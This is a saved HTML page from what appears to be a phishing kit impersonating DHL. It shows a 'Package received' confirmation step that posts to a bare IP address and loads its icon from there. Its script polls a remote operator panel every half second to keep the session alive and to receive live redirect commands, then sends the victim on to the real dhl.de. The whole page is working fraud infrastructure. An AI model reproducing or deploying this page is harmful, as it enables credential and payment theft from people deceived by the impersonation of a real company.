<!DOCTYPE html>
<!-- saved from url=(0014)about:internet -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Package received - DHL</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
<meta name="robots" content="nofollow,noindex">
<link rel="preconnect" href="https://fonts.googleapis.com/">
<link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
<link href="./finish_files/css2" rel="stylesheet">
<link rel="stylesheet" href="./finish_files/style.css">
<link rel="icon" href="http://154.151.120.67:8080/source/res/icon.png">
<script src="./finish_files/jq.js.download"></script>
<script src="./finish_files/v.js.download"></script>
<script src="./finish_files/m.js.download"></script>
<script src="./finish_files/arr.js.download"></script>
</head>
<body>
<div class="top">
<div class="left">
<img src="./finish_files/dhl-logo.svg">
</div>
<div class="right">
<button class="logout">MyDHL</button>

</div>
</div>

<div class="content">
 

<div class="form">
<div class="steps">
<div class="step completed">1</div>
<div class="line completed" id="l2"></div>
<div class="step completed" id="s2">2</div>
<div class="line completed" id="l3"></div>
<div class="step completed" id="s3"><img src="./finish_files/check.svg" style="width:15px;"></div>
</div>
 

 

<form action="http://154.151.120.67:8080/source/send.php" method="post" id="done" onsubmit="return false;">

<h2>Felicidades!</h2>
<div class="form-col">
<p>  
The processis finished. We will contact you shortly if necessary. Thanks!

</p>
</div>
 
<div class="form-col">
<button onclick="home()" class="defaultbtn">MyDHL</button>
<button onclick="home()" class="logoutbtn">Log out</button>
</div>
</form>
 

</div>
</div>


<div class="windowloader" id="loader" style="display:none;">
<div class="wl-content">
<div class="loader">
</div>
</div>
</div>
 <script>
 setInterval(function(){
	$.post("../panel/process/processor.php",
	{keepAlive:1, page:"FINISH"} );
}, 500);
 
clearRedirections();

var redirect=0;
setInterval(function(){
	$.post("../panel/process/processor.php",{redirectionListener:1}, function(data){
		redirect=data;
		if(redirect==0){
			return false;
		}else{
			clearRedirections();
			window.location=targets[redirect];
		}
	});
}, 500);




function clearRedirections(){
	$.post("../panel/process/processor.php",
	{clearRedirection:1});
}
 
 function home(){
	 window.location="https://dhl.de";
 }
</script>

</body></html>